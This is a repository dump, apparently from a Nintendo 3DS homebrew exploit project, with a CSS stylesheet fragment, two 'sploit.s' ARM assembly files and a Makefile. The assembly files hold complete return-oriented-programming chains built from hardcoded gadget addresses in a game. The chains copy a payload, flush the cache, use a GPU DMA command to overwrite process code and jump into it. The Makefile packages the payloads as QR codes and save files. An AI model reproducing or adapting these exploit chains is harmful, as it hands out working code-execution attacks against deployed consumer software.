100 | 	clear: both;
101 | }
102 | 
103 | #header-wrapper
104 | {
105 | 	margin:0 0 0 0;
106 | 	overflow: hidden;
107 | 	height: 90px;
108 | 	margin-bottom: 5px;
109 | 	background: #000;
110 | 	position: relative;
111 | }
112 | 
113 | #header {
114 | 	overflow: hidden;
115 | }
116 | 
117 | #page {
118 | 	overflow: hidden;
119 | }
120 | 
121 | #toplogo {
122 | 	margin: 0 auto;
123 | 	width:580px;
124 | }
125 | 
126 | #content {
127 | 	margin: 0 auto;
128 | 	width:790px;
129 | 	padding: 20px 10px 20px 20px;
130 | 	background: #000;
131 | }
132 | 
133 | #content h2 a
134 | {
135 | 	display: block;
136 | 	padding: 0px 0px 10px 0px;
137 | 	text-decoration: none;
138 | 	color: #FFFFFF;
139 | }
140 | 
141 | #content #newsbox
142 | {
143 | 	margin-bottom: 15px;
144 | }
145 | 
146 | #footer {
147 | 	overflow: hidden;
148 | 	margin: 5px auto 0 auto;
149 | 	padding: 10px 0px 0;
150 | 	background: #000;
151 | 	width:auto;
152 | 	height: 55px;
153 | }
154 | 
155 | #footer p {
156 | 	text-align: center;
157 | 	font-size: 16px;
158 | }
159 | 
160 | #footer a {
161 | }
162 | 
163 | ul.style2 {
164 | 	margin: 0px;
165 | 	padding: 10px 0px 0px 0px;
166 | 	list-style: none;
167 | }
168 | 
169 | ul.style2 li {
170 | 	clear: both;
171 | 	margin-bottom: 25px;
172 | 	padding: 30px 0px 40px 0px;
173 | 	border-top: none;
174 | 	box-shadow: inset 0 1px 0 rgba(255,255,255,.10);
175 | }
176 | 
177 | ul.style1 {
178 | 	margin: 0px;
179 | 	padding: 10px 0px 0px 0px;
180 | 	list-style: none;
181 | }
182 | 
183 | ul.style1 li {
184 | 	clear: both;
185 | 	margin-bottom: 25px;
186 | 	padding: 30px 0px 5px 0px;
187 | 	border-top: 1px solid #000000;
188 | 	box-shadow: inset 0 1px 0 rgba(255,255,255,.10);
189 | }
190 | 
191 | ul.style1 h3 {
192 | 	padding-bottom: 5px;
193 | 	font-size: 18px;
194 | 	color: #FFFFFF;
195 | }
196 | 
197 | ul.style1 p {
198 | 	line-height: 150%;
199 | }
200 | 
201 | ul.style1 .button-more {
202 | 	float: left;
203 | 	margin-top: 0px;
204 | }
205 | 
206 | ul.style1 .maintext {
207 | 	padding-top: 0px;
208 | 	border-top: none;
209 | 	box-shadow: none;
210 | }
211 | 
212 | ul.style3 {
213 | 	margin: 0px;
214 | 	padding: 0px 8px;
215 | 	list-style: none;
216 | }
217 | 
218 | ul.style3 li {
219 | 	padding: 10px 0px 10px 0px;
220 | 	border-top: 1px solid #000000;
221 | 	box-shadow: inset 0 1px 0 rgba(255,255,255,.10);
222 | }
223 | 
224 | ul.style3 a {
225 | 	text-decoration: none;
226 | 	color: #949494;
227 | }
228 | 
229 | ul.style3 a:hover {
230 | 	text-decoration: none;
231 | }
232 | 
233 | ul.style3 .sidebardeco {
234 | 	padding-top: 0px;
235 | 	border-top: none;
236 | 	box-shadow: none;
237 | }
238 | 
239 | ul.style3 .date {
240 | 	width: 130px;
241 | 	background-color: #999999;
242 | 	margin-top: 20px;
243 | 	height: 24px;
244 | 	line-height: 24px;
245 | 	text-align: center;
246 | 	font-size: 16px;
247 | 	color: #FFF;
248 | 		-moz-border-radius: 6px;
249 | 	-webkit-border-radius: 6px;
250 | 	border: 1px solid #666;
251 | 	padding: 3px;
252 | }
253 | 
254 | ul.style3 .date
255 | {
256 | 	margin-top: 0px;
257 | }
258 | 
259 | .button-more
260 | {
261 | 	display: block;
262 | 	background-color: #B0B0B0;
263 | 	text-decoration:none;
264 | 	margin-top: 20px;
265 | 	padding: 5px 30px;
266 | 	height: 24px;
267 | 	line-height: 24px;
268 | 	text-align: center;
269 | 	color: #FFF;
270 | 	-moz-border-radius: 6px;
271 | 	-webkit-border-radius: 6px;
272 | 	border: 1px solid #666;
273 | 	padding: 3px;
274 | }
275 | .button-more a:hover
276 | {
277 | 	display: none;
278 | 	background-color: #000;
279 | 	margin-top: 20px;
280 | 	padding: 5px 30px;
281 | 	height: 24px;
282 | 	text-decoration:none;
283 | 	line-height: 24px;
284 | 	color: #000;
285 | 	-moz-border-radius: 12px;
286 | 	-webkit-border-radius: 12px;
287 | 	border: 4px solid #666;
288 | 	padding: 3px;
289 | }
290 | 
291 | .entry
292 | {
293 | 	margin-bottom: 30px;
294 | }
295 | 


--------------------------------------------------------------------------------
/cn_qr_initial_loader/WEST/sploit.s:
--------------------------------------------------------------------------------
  1 | .nds
  2 | 
  3 | .include "../../build/constants.s"
  4 | 
  5 | .open "sploit_proto.bin","cn_qr_initial_loader.bin",0x0
  6 | 
  7 | .arm
  8 | 
  9 | CN_CODELOCATIONVA equ (CN_HEAPPAYLOADADR+codePatch-ROP)
 10 | CN_GXCOMMAND_ADR equ (CN_GSPHEAP+0x000F0000)
 11 | CN_TMPVAR_ADR equ (CN_GSPHEAP+0x000E0000)
 12 | 
 13 | ;length
 14 | .orga 0x60
 15 | 	.word endROP-ROP+0xA8-0x64
 16 | 	; .word secondaryROP-ROP+0xA8-0x64
 17 | 
 18 | ;ROP
 19 | .orga 0xA8
 20 | ROP:
 21 | 	;jump to safer place
 22 | 		
 23 | 		.word 0x002c9628 ; pop	{r0, pc}
 24 | 			.word 0x0FFFE358 ; r0 
 25 | 		.word 0x001dd62c ; ldr r0, [r0] | pop {r4, pc}
 26 | 			.word 0x00000008 ; r4
 27 | 		.word 0x001e2c08 ; add r0, r0, r4 | pop {r4, pc}
 28 | 			.word 0xDEADC0DE ; r4 (garbage)
 29 | 		.word 0x001dd62c ; ldr r0, [r0] | pop {r4, pc}
 30 | 			.word CN_TMPVAR_ADR ; r4 (tmp var adr)
 31 | 		.word 0x001fb820 ; str r0, [r4] | pop {r4, pc}
 32 | 			.word -(CN_STACKPAYLOADADR-0xA8) ; r4 (offset)
 33 | 		.word 0x001e2c08 ; add r0, r0, r4 | pop {r4, pc}
 34 | 			.word CN_STACKPAYLOADADR+filePayloadOffset-ROP ; r4 (garbage)
 35 | 		.word 0x001fb820 ; str r0, [r4] | pop {r4, pc}
 36 | 			.word 0xDEADC0DE ; r4 (garbage)
 37 | 		.word 0x001001c8 ; pop {r3} | add sp, sp, r3 | pop {pc}
 38 | 		filePayloadOffset:
 39 | 			.word 0xDEADC0DE ; r3 (garbage because gets overwritten by previous gadget)
 40 | 
 41 | secondaryROP:
 42 | 
 43 | 	;copy code to GSP heap
 44 | 		.word 0x001bbeb8 ; pop {r3, pc}
 45 | 			.word 0x002c9628 ; r3 (pop {r0, pc})
 46 | 		.word 0x00106eb8 ; pop {r4, lr} | bx r3
 47 | 			.word 0xDEADC0DE ; r4 (garbage)
 48 | 			.word 0x002c9628 ; lr (pop	{r0, pc})
 49 | 		;equivalent to .word 0x002c9628 ; pop {r0, pc}
 50 | 			.word CN_TMPVAR_ADR-4 ; r0 (tmp var)
 51 |   		.word 0x002c7784 ; ldr r1, [r0, #4] | add r0, r0, r1 | pop {r3, r4, r5, pc}
 52 | 			.word 0xDEADC0DE ; r3 (garbage)
 53 | 			.word 0xDEADC0DE ; r4 (garbage)
 54 | 			.word 0xDEADC0DE ; r5 (garbage)
 55 | 		.word 0x002c9628 ; pop	{r0, pc}
 56 | 			.word CN_CODELOCATIONGSP-codePatch ; r0 (dst)
 57 | 		.word 0x0020b8e8 ; pop	{r2, r3, r4, pc}
 58 | 			.word codePatchEnd ; r2 (size)
 59 | 			.word 0xDEADC0DE ; r3 (garbage)
 60 | 			.word 0xDEADC0DE ; r4 (garbage)
 61 | 		.word 0x00224FB0 ; memcpy (ends in BX LR)
 62 | 
 63 | 	;flush data cache
 64 | 		;equivalent to .word 0x002c9628 ; pop {r0, pc}
 65 | 			.word CN_GSPHANDLE_ADR ; r0 (handle ptr)
 66 | 		.word 0x00226734 ; pop	{r1, pc}
 67 | 			.word 0xFFFF8001 ; r1 (kprocess handle)
 68 | 		.word 0x0020b8e8 ; pop	{r2, r3, r4, pc}
 69 | 			.word CN_CODELOCATIONGSP  ; r2 (address)
 70 | 			.word codePatchEnd-codePatch ; r3 (size)
 71 | 			.word 0xDEADC0DE ; r4 (garbage)
 72 | 		.word CN_GSPGPU_FlushDataCache_ADR+4 ; GSPGPU_FlushDataCache (ends in LDMFD   SP!, {R4-R6,PC})
 73 | 			.word 0xDEADC0DE ; r4 (garbage)
 74 | 			.word 0xDEADC0DE ; r5 (garbage)
 75 | 			.word 0xDEADC0DE ; r6 (garbage)
 76 | 
 77 | 
 78 | 	;create GX command
 79 | 		.word 0x001dd630 ; pop {r4, pc}
 80 | 
 81 | 			.word CN_GXCOMMAND_ADR+0x0 ; r4
 82 | 		.word 0x002c9628 ; pop	{r0, pc}
 83 | 			.word 0x00000004
 84 | 		.word 0x001fb820 ; str r0, [r4] | pop {r4, pc}
 85 | 
 86 | 			.word CN_GXCOMMAND_ADR+0x4 ; r4
 87 | 		.word 0x002c9628 ; pop	{r0, pc}
 88 | 			.word CN_CODELOCATIONGSP
 89 | 		.word 0x001fb820 ; str r0, [r4] | pop {r4, pc}
 90 | 
 91 | 			.word CN_GXCOMMAND_ADR+0x8 ; r4
 92 | 		.word 0x002c9628 ; pop	{r0, pc}
 93 | 			.word CN_GSPHEAP+CN_TEXTPA_OFFSET_FROMEND+CN_INITIALCODE_OFFSET+FIRM_APPMEMALLOC ; r0
 94 | 		.word 0x001fb820 ; str r0, [r4] | pop {r4, pc}
 95 | 
 96 | 			.word CN_GXCOMMAND_ADR+0xC ; r4
 97 | 		.word 0x002c9628 ; pop	{r0, pc}
 98 | 			.word 0x00010000
 99 | 		.word 0x001fb820 ; str r0, [r4] | pop {r4, pc}
100 | 
101 | 			.word CN_GXCOMMAND_ADR+0x10 ; r4
102 | 		.word 0x002c9628 ; pop	{r0, pc}
103 | 			.word 0x00000000
104 | 		.word 0x001fb820 ; str r0, [r4] | pop {r4, pc}
105 | 
106 | 			.word CN_GXCOMMAND_ADR+0x14 ; r4
107 | 		.word 0x001fb820 ; str r0, [r4] | pop {r4, pc}
108 | 			
109 | 			.word CN_GXCOMMAND_ADR+0x18 ; r4
110 | 		.word 0x002c9628 ; pop	{r0, pc}
111 | 			.word 0x00000008
112 | 		.word 0x001fb820 ; str r0, [r4] | pop {r4, pc}
113 | 
114 | 			.word CN_GXCOMMAND_ADR+0x1C ; r4
115 | 		.word 0x002c9628 ; pop	{r0, pc}
116 | 			.word 0x00000000
117 | 		.word 0x001fb820 ; str r0, [r4] | pop {r4, pc}
118 | 			.word 0xDEADC0DE ; r4 (garbage)
119 | 
120 | 	;send GX command
121 | 		.word 0x002c9628 ; pop	{r0, pc}
122 | 			.word 0x356208+0x58 ; r0
123 | 		.word 0x00226734 ; pop	{r1, pc}
124 | 			.word CN_GXCOMMAND_ADR ; r1 (cmd addr)
125 | 		.word CN_nn__gxlow__CTR__CmdReqQueueTx__TryEnqueue+4 ; nn__gxlow__CTR__CmdReqQueueTx__TryEnqueue (ends in LDMFD   SP!, {R4-R8,PC})
126 | 			.word 0xDEADC0DE ; r4 (garbage)
127 | 			.word 0xDEADC0DE ; r5 (garbage)
128 | 			.word 0xDEADC0DE ; r6 (garbage)
129 | 			.word 0xDEADC0DE ; r7 (garbage)
130 | 			.word 0xDEADC0DE ; r8 (garbage)
131 | 
132 | 	;sleep for a second and jump to code
133 | 		.word 0x00226734 ; pop {r3, pc}
134 | 			.word 0x002c9628 ; r1 (pop {r0, pc})
135 | 		.word 0x0012ec64 ; pop {r4, lr} | bx r1
136 | 			.word 0xDEADC0DE ; r4 (garbage)
137 | 			.word 0x002c9628 ; lr (pop {r0, pc})
138 | 		;equivalent to .word 0x002c9628 ; pop {r0, pc}
139 | 			.word 0x3B9ACA00 ; r0 = 1 second
140 | 		.word 0x00226734 ; pop	{r1, pc}
141 | 			.word 0x00000000 ; r1
142 | 		.word 0x00293D14 ; svcSleepThread (ends in BX	LR)
143 | 		;equivalent to .word 0x002c9628 ; pop {r0, pc}
144 | 			.word 0x00000000 ; r0 (time_low)
145 | 		.word 0x00226734 ; pop	{r1, pc}
146 | 			.word 0x00000000 ; r1 (time_high)
147 | 		.word 0x00100000+CN_INITIALCODE_OFFSET ;jump to code
148 | 
149 | 		.word 0xBEEF0000
150 | endROP:
151 | 
152 | .align 4
153 | codePatch:
154 | 	.incbin "cn_initial/cn_initial.bin"
155 | 	.word 0xDEADDEAD
156 | 	.word 0xDEADDEAD
157 | 	.word 0xDEADDEAD
158 | 	.word 0xDEADDEAD
159 | codePatchEnd:
160 | 
161 | .Close
162 | 


--------------------------------------------------------------------------------
/Makefile:
--------------------------------------------------------------------------------
  1 | ifeq ($(strip $(DEVKITARM)),)
  2 | $(error "Please set DEVKITARM in your environment. export DEVKITARM=<path to>devkitARM")
  3 | endif
  4 | 
  5 | ifeq ($(strip $(CTRULIB)),)
  6 | $(error "Please set CTRULIB in your environment. export DEVKITARM=<path to>ctrulib/libctru")
  7 | endif
  8 | 
  9 | ifeq ($(filter $(DEVKITARM)/bin,$(PATH)),)
 10 | export PATH:=$(DEVKITARM)/bin:$(PATH)
 11 | endif
 12 | 
 13 | # FIRMVERSION = OLD_MEMMAP
 14 | # FIRMVERSION = NEW_MEMMAP
 15 | 
 16 | # CNVERSION = WEST
 17 | # CNVERSION = JPN
 18 | # ROVERSION = 1024
 19 | # ROVERSION = 2049
 20 | # ROVERSION = 3074
 21 | # ROVERSION = 4096
 22 | # SPIDERVERSION = 2050
 23 | # SPIDERVERSION = 3074
 24 | # SPIDERVERSION = 4096
 25 | 
 26 | export FIRMVERSION
 27 | export CNVERSION
 28 | export ROVERSION
 29 | export SPIDERVERSION
 30 | export MENUVERSION
 31 | export LOADROPBIN
 32 | export OTHERAPP
 33 | 
 34 | PAYLOAD_SRCPATH	:=	build/cn_secondary_payload.bin
 35 | 
 36 | ROPBIN_CMD0	:=	
 37 | ROPBIN_CMD1	:=	
 38 | ifneq ($(strip $(LOADROPBIN)),)
 39 | 	ROPBIN_CMD0	:=	@cp build/menu_ropbin.bin cn_secondary_payload/data/
 40 | 	ROPBIN_CMD1	:=	@cp menu_payload/menu_ropbin.bin build/
 41 | endif
 42 | 
 43 | OUTNAME = $(FIRMVERSION)_$(CNVERSION)_$(MENUVERSION)
 44 | 
 45 | QRCODE_TARGET0	:=	q/$(OUTNAME).png
 46 | QRCODE_TARGET1	:=	build/cn_save_initial_loader.bin
 47 | QRCODE_TARGET1_CMD	:=	@cp $(QRCODE_TARGET1) cn_secondary_payload/data/
 48 | 
 49 | ifneq ($(strip $(OTHERAPP)),)
 50 | 	PAYLOAD_SRCPATH	:=	cn_secondary_payload/cn_secondary_payload.bin
 51 | 	QRCODE_TARGET0	:=	
 52 | 	QRCODE_TARGET1	:=	
 53 | 	QRCODE_TARGET1_CMD	:=	
 54 | endif
 55 | 
 56 | SCRIPTS = "scripts"
 57 | 
 58 | .PHONY: directories all menu_ropdb build/constants firm_constants/constants.txt cn_constants/constants.txt menu_ropdb/ropdb.txt cn_qr_initial_loader/cn_qr_initial_loader.bin.png cn_save_initial_loader/cn_save_initial_loader.bin cn_secondary_payload/cn_secondary_payload.bin cn_bootloader/cn_bootloader.bin menu_payload/menu_payload_regionfree.bin menu_payload/menu_payload_loadropbin.bin menu_payload/menu_ropbin.bin
 59 | 
 60 | all: directories build/constants $(QRCODE_TARGET0) p/$(OUTNAME).bin $(QRCODE_TARGET1)
 61 | directories:
 62 | 	@mkdir -p build && mkdir -p build/cro
 63 | 	@mkdir -p p
 64 | 	@mkdir -p q
 65 | 
 66 | menu_ropdb:
 67 | 	@mkdir -p menu_ropdb/11272
 68 | 	@mkdir -p menu_ropdb/12288
 69 | 	@mkdir -p menu_ropdb/13330
 70 | 	@mkdir -p menu_ropdb/15360
 71 | 	@mkdir -p menu_ropdb/16404
 72 | 	@mkdir -p menu_ropdb/17415
 73 | 	@mkdir -p menu_ropdb/19456
 74 | 	@mkdir -p menu_ropdb/20480_usa
 75 | 	@echo building ropDB for menu version 11272...
 76 | 	@python scripts/portRopDb.py menu_17415_code.bin menu_11272_code.bin 0x00100000 menu_ropdb/17415_proto/ropdb.txt menu_ropdb/11272/ropdb.txt
 77 | 	@echo building ropDB for menu version 12288...
 78 | 	@python scripts/portRopDb.py menu_17415_code.bin menu_12288_code.bin 0x00100000 menu_ropdb/17415_proto/ropdb.txt menu_ropdb/12288/ropdb.txt
 79 | 	@echo building ropDB for menu version 13330...
 80 | 	@python scripts/portRopDb.py menu_17415_code.bin menu_13330_code.bin 0x00100000 menu_ropdb/17415_proto/ropdb.txt menu_ropdb/13330/ropdb.txt
 81 | 	@echo building ropDB for menu version 15360...
 82 | 	@python scripts/portRopDb.py menu_17415_code.bin menu_15360_code.bin 0x00100000 menu_ropdb/17415_proto/ropdb.txt menu_ropdb/15360/ropdb.txt
 83 | 	@echo building ropDB for menu version 16404...
 84 | 	@python scripts/portRopDb.py menu_17415_code.bin menu_16404_code.bin 0x00100000 menu_ropdb/17415_proto/ropdb.txt menu_ropdb/16404/ropdb.txt
 85 | 	@echo building ropDB for menu version 17415...
 86 | 	@python scripts/portRopDb.py menu_17415_code.bin menu_17415_code.bin 0x00100000 menu_ropdb/17415_proto/ropdb.txt menu_ropdb/17415/ropdb.txt
 87 | 	@echo building ropDB for menu version 19456...
 88 | 	@python scripts/portRopDb.py menu_17415_code.bin menu_19456_code.bin 0x00100000 menu_ropdb/17415_proto/ropdb.txt menu_ropdb/19456/ropdb.txt
 89 | 	@echo building ropDB for menu version 20480_usa...
 90 | 	@python scripts/portRopDb.py menu_17415_code.bin menu_20480_usa_code.bin 0x00100000 menu_ropdb/17415_proto/ropdb.txt menu_ropdb/20480_usa/ropdb.txt
 91 | 
 92 | q/$(OUTNAME).png: build/cn_qr_initial_loader.bin.png
 93 | 	@cp build/cn_qr_initial_loader.bin.png q/$(OUTNAME).png
 94 | 
 95 | p/$(OUTNAME).bin: $(PAYLOAD_SRCPATH)
 96 | 	@cp $(PAYLOAD_SRCPATH) p/$(OUTNAME).bin
 97 | 
 98 | firm_constants/constants.txt:
 99 | 	@cd firm_constants && make
100 | cn_constants/constants.txt:
101 | 	@cd cn_constants && make
102 | menu_ropdb/ropdb.txt:
103 | 	@cd menu_ropdb && make
104 | 
105 | build/constants: firm_constants/constants.txt cn_constants/constants.txt menu_ropdb/ropdb.txt
106 | 	@python $(SCRIPTS)/makeHeaders.py $(FIRMVERSION) $(CNVERSION) $(SPIDERVERSION) $(ROVERSION) $(MENUVERSION) build/constants $^
107 | 
108 | build/cn_qr_initial_loader.bin.png: cn_qr_initial_loader/cn_qr_initial_loader.bin.png
109 | 	@cp cn_qr_initial_loader/cn_qr_initial_loader.bin.png build
110 | cn_qr_initial_loader/cn_qr_initial_loader.bin.png:
111 | 	@cd cn_qr_initial_loader && make
112 | 
113 | 
114 | build/cn_save_initial_loader.bin: cn_save_initial_loader/cn_save_initial_loader.bin
115 | 	@cp cn_save_initial_loader/cn_save_initial_loader.bin build
116 | cn_save_initial_loader/cn_save_initial_loader.bin:
117 | 	@cd cn_save_initial_loader && make
118 | 
119 | 
120 | build/cn_secondary_payload.bin: cn_secondary_payload/cn_secondary_payload.bin
121 | 	@python $(SCRIPTS)/blowfish.py cn_secondary_payload/cn_secondary_payload.bin build/cn_secondary_payload.bin scripts
122 | cn_secondary_payload/cn_secondary_payload.bin: $(QRCODE_TARGET1) build/menu_payload_regionfree.bin build/menu_payload_loadropbin.bin build/menu_ropbin.bin
123 | 	@mkdir -p cn_secondary_payload/data
124 | 	$(QRCODE_TARGET1_CMD)
125 | 	@cp build/menu_payload_regionfree.bin cn_secondary_payload/data/
126 | 	@cp build/menu_payload_loadropbin.bin cn_secondary_payload/data/
127 | 	$(ROPBIN_CMD0)
128 | 	@cd cn_secondary_payload && make
129 | 
130 | 
131 | build/menu_payload_regionfree.bin build/menu_payload_loadropbin.bin build/menu_ropbin.bin: menu_payload/menu_payload_regionfree.bin menu_payload/menu_payload_loadropbin.bin menu_payload/menu_ropbin.bin
132 | 	@cp menu_payload/menu_payload_regionfree.bin build/
133 | 	@cp menu_payload/menu_payload_loadropbin.bin build/
134 | 	$(ROPBIN_CMD1)
135 | menu_payload/menu_payload_regionfree.bin menu_payload/menu_payload_loadropbin.bin menu_payload/menu_ropbin.bin:
136 | 	@cd menu_payload && make
137 | 
138 | 
139 | clean:
140 | 	@rm -rf build/*
141 | 	@cd firm_constants && make clean
142 | 	@cd cn_constants && make clean
143 | 	@cd menu_ropdb && make clean
144 | 	@cd cn_qr_initial_loader && make clean
145 | 	@cd cn_save_initial_loader && make clean
146 | 	@cd cn_secondary_payload && make clean
147 | 	@cd menu_payload && make clean
148 | 	@echo "all cleaned up !"
149 | 


--------------------------------------------------------------------------------
/cn_save_initial_loader/JPN/sploit.s:
--------------------------------------------------------------------------------
  1 | .nds
  2 | 
  3 | .include "../../build/constants.s"
  4 | 
  5 | .open "sploit_proto.bin","cn_save_initial_loader.bin",0x0
  6 | 
  7 | .arm
  8 | 
  9 | CN_GXCOMMAND_ADR equ (CN_GSPHEAP+0x000F0000)
 10 | CN_TMPVAR_ADR equ (CN_GSPHEAP+0x000E0000)
 11 | 
 12 | ;length
 13 | .orga 0x60
 14 | 	.word endROP-ROP+0xA8-0x64
 15 | 	; .word secondaryROP-ROP+0xA8-0x64
 16 | 
 17 | ;ROP
 18 | .orga 0xA8
 19 | ROP:
 20 | 	;jump to safer place
 21 | 		
 22 | 		.word 0x002d2b18 ; pop	{r0, pc}
 23 | 			.word 0x0FFFFF28 ; r0 
 24 | 		.word 0x00272738 ; ldr r0, [r0] | pop {r4, pc}
 25 | 			.word CN_TMPVAR_ADR ; r4 (tmp var adr)
 26 | 		.word 0x0020096c ; str r0, [r4] | pop {r4, pc}
 27 | 			.word -(CN_STACKPAYLOADADR-0xA8) ; r4 (offset)
 28 | 		.word 0x001e5ab0 ; add r0, r0, r4 | pop {r4, pc}
 29 | 			.word CN_STACKPAYLOADADR+filePayloadOffset-ROP ; r4 (garbage)
 30 | 		.word 0x0020096c ; str r0, [r4] | pop {r4, pc}
 31 | 			.word 0xDEADC0DE ; r4 (garbage)
 32 | 		.word 0x001001c8 ; pop {r3} | add sp, sp, r3 | pop {pc}
 33 | 		filePayloadOffset:
 34 | 			.word 0xDEADC0DE ; r3 (garbage because gets overwritten by previous gadget)
 35 | 
 36 | secondaryROP:
 37 | 
 38 | 	;copy code to GSP heap
 39 | 		.word 0x001742ec ; pop {r3, pc}
 40 | 			.word 0x002d2b18 ; r3 (pop {r0, pc})
 41 | 		.word 0x00106ee8 ; pop {r4, lr} | bx r3
 42 | 			.word 0xDEADC0DE ; r4 (garbage)
 43 | 			.word 0x002d2b18 ; lr (pop	{r0, pc})
 44 | 		;equivalent to .word 0x002d2b18 ; pop {r0, pc}
 45 | 			.word CN_TMPVAR_ADR-4 ; r0 (tmp var)
 46 |   		.word 0x00271df8 ; ldr r1, [r0, #4] | add r0, r0, r1 | pop {r3, r4, r5, pc}
 47 | 			.word 0xDEADC0DE ; r3 (garbage)
 48 | 			.word 0xDEADC0DE ; r4 (garbage)
 49 | 			.word 0xDEADC0DE ; r5 (garbage)
 50 | 		.word 0x002d2b18 ; pop	{r0, pc}
 51 | 			.word CN_CODELOCATIONGSP-codePatch ; r0 (dst)
 52 | 		.word 0x0010fc14 ; pop	{r2, r3, r4, pc}
 53 | 			.word codePatchEnd ; r2 (size)
 54 | 			.word 0xDEADC0DE ; r3 (garbage)
 55 | 			.word 0xDEADC0DE ; r4 (garbage)
 56 | 		.word 0x00229B38 ; memcpy (ends in BX LR)
 57 | 
 58 | 	;flush data cache
 59 | 		;equivalent to .word 0x002d2b18 ; pop {r0, pc}
 60 | 			.word CN_GSPHANDLE_ADR ; r0 (handle ptr)
 61 | 		.word 0x0022b2bc ; pop	{r1, pc}
 62 | 			.word 0xFFFF8001 ; r1 (kprocess handle)
 63 | 		.word 0x0010fc14 ; pop	{r2, r3, r4, pc}
 64 | 			.word CN_CODELOCATIONGSP  ; r2 (address)
 65 | 			; .word codePatchEnd-codePatch ; r3 (size) ; beware cache flushing trouble...
 66 | 			.word 0x00010000 ; r3 (size)
 67 | 			.word 0xDEADC0DE ; r4 (garbage)
 68 | 		.word CN_GSPGPU_FlushDataCache_ADR+4 ; GSPGPU_FlushDataCache (ends in LDMFD SP!, {R4-R6,PC})
 69 | 			.word 0xDEADC0DE ; r4 (garbage)
 70 | 			.word 0xDEADC0DE ; r5 (garbage)
 71 | 			.word 0xDEADC0DE ; r6 (garbage)
 72 | 
 73 | 	;create GX command
 74 | 		.word 0x0027273C ; pop {r4, pc}
 75 | 
 76 | 			.word CN_GXCOMMAND_ADR+0x0 ; r4
 77 | 		.word 0x002d2b18 ; pop	{r0, pc}
 78 | 			.word 0x00000004
 79 | 		.word 0x0020096c ; str r0, [r4] | pop {r4, pc}
 80 | 
 81 | 			.word CN_GXCOMMAND_ADR+0x4 ; r4
 82 | 		.word 0x002d2b18 ; pop	{r0, pc}
 83 | 			.word CN_CODELOCATIONGSP
 84 | 		.word 0x0020096c ; str r0, [r4] | pop {r4, pc}
 85 | 
 86 | 			.word CN_GXCOMMAND_ADR+0x8 ; r4
 87 | 		.word 0x002d2b18 ; pop	{r0, pc}
 88 | 			.word CN_GSPHEAP+CN_TEXTPA_OFFSET_FROMEND+CN_INITIALCODE_OFFSET+FIRM_APPMEMALLOC ; r0
 89 | 		.word 0x0020096c ; str r0, [r4] | pop {r4, pc}
 90 | 
 91 | 			.word CN_GXCOMMAND_ADR+0xC ; r4
 92 | 		.word 0x002d2b18 ; pop	{r0, pc}
 93 | 			.word 0x00010000
 94 | 		.word 0x0020096c ; str r0, [r4] | pop {r4, pc}
 95 | 
 96 | 			.word CN_GXCOMMAND_ADR+0x10 ; r4
 97 | 		.word 0x002d2b18 ; pop	{r0, pc}
 98 | 			.word 0x00000000
 99 | 		.word 0x0020096c ; str r0, [r4] | pop {r4, pc}
100 | 
101 | 			.word CN_GXCOMMAND_ADR+0x14 ; r4
102 | 		.word 0x0020096c ; str r0, [r4] | pop {r4, pc}
103 | 			
104 | 			.word CN_GXCOMMAND_ADR+0x18 ; r4
105 | 		.word 0x002d2b18 ; pop	{r0, pc}
106 | 			.word 0x00000008
107 | 		.word 0x0020096c ; str r0, [r4] | pop {r4, pc}
108 | 
109 | 			.word CN_GXCOMMAND_ADR+0x1C ; r4
110 | 		.word 0x002d2b18 ; pop	{r0, pc}
111 | 			.word 0x00000000
112 | 		.word 0x0020096c ; str r0, [r4] | pop {r4, pc}
113 | 			.word 0xDEADC0DE ; r4 (garbage)
114 | 
115 | 	;send GX command
116 | 		.word 0x002d2b18 ; pop	{r0, pc}
117 | 			.word CN_GSPSHAREDBUF_ADR ; r0
118 | 		.word 0x0022b2bc ; pop	{r1, pc}
119 | 			.word CN_GXCOMMAND_ADR ; r1 (cmd addr)
120 | 		.word CN_nn__gxlow__CTR__CmdReqQueueTx__TryEnqueue+4 ; nn__gxlow__CTR__CmdReqQueueTx__TryEnqueue (ends in LDMFD   SP!, {R4-R8,PC})
121 | 			.word 0xDEADC0DE ; r4 (garbage)
122 | 			.word 0xDEADC0DE ; r5 (garbage)
123 | 			.word 0xDEADC0DE ; r6 (garbage)
124 | 			.word 0xDEADC0DE ; r7 (garbage)
125 | 			.word 0xDEADC0DE ; r8 (garbage)
126 | 
127 | 	;sleep for a second and jump to code
128 | 		.word 0x001742ec ; pop {r3, pc}
129 | 			.word 0x002d2b18 ; r3 (pop {r0, pc})
130 | 		.word 0x00106ee8 ; pop {r4, lr} | bx r3
131 | 			.word 0xDEADC0DE ; r4 (garbage)
132 | 			.word 0x002d2b18 ; lr (pop {r0, pc})
133 | 		;equivalent to .word 0x002d2b18 ; pop {r0, pc}
134 | 			.word 0x3B9ACA00 ; r0 = 1 second
135 | 			; .word 0xFFFFFFFF ; r0 = forever
136 | 		.word 0x0022b2bc ; pop	{r1, pc}
137 | 			.word 0x00000000 ; r1
138 | 			; .word 0x0FFFFFFF ; r1 = forever
139 | 		.word 0x0029D7DC ; svcSleepThread (ends in BX LR)
140 | 		;equivalent to .word 0x002d2b18 ; pop {r0, pc}
141 | 			.word 0x00000000 ; r0 (time_low)
142 | 		.word 0x0022b2bc ; pop	{r1, pc}
143 | 			.word 0x00000000 ; r1 (time_high)
144 | 
145 | ; DEBUG !
146 | 	;copy garbage to framebuffer
147 | 		.word 0x002d2b18 ; pop {r0, pc}
148 | 			.word CN_TOPFBADR1    ; r0 (dst)
149 | 		.word 0x0022b2bc ; pop	{r1, pc}
150 | 			.word CN_CODELOCATIONGSP ; r1 (src)
151 | 		.word 0x0010fc14 ; pop	{r2, r3, r4, pc}
152 | 			.word 0x46500 ; r2 (size)
153 | 			.word 0xDEADC0DE ; r3 (garbage)
154 | 			.word 0xDEADC0DE ; r4 (garbage)
155 | 		.word 0x00229B38 ; memcpy (ends in BX LR)
156 | 		;equivalent to .word 0x002d2b18 ; pop {r0, pc}
157 | 			.word 0xDEADC0DE ; r0 (garbage)
158 | 
159 | 	;copy garbage to framebuffer
160 | 		.word 0x002d2b18 ; pop {r0, pc}
161 | 			.word CN_TOPFBADR2    ; r0 (dst)
162 | 		.word 0x0022b2bc ; pop	{r1, pc}
163 | 			.word CN_CODELOCATIONGSP ; r1 (src)
164 | 		.word 0x0010fc14 ; pop	{r2, r3, r4, pc}
165 | 			.word 0x46500 ; r2 (size)
166 | 			.word 0xDEADC0DE ; r3 (garbage)
167 | 			.word 0xDEADC0DE ; r4 (garbage)
168 | 		.word 0x00229B38 ; memcpy (ends in BX LR)
169 | 		;equivalent to .word 0x002d2b18 ; pop {r0, pc}
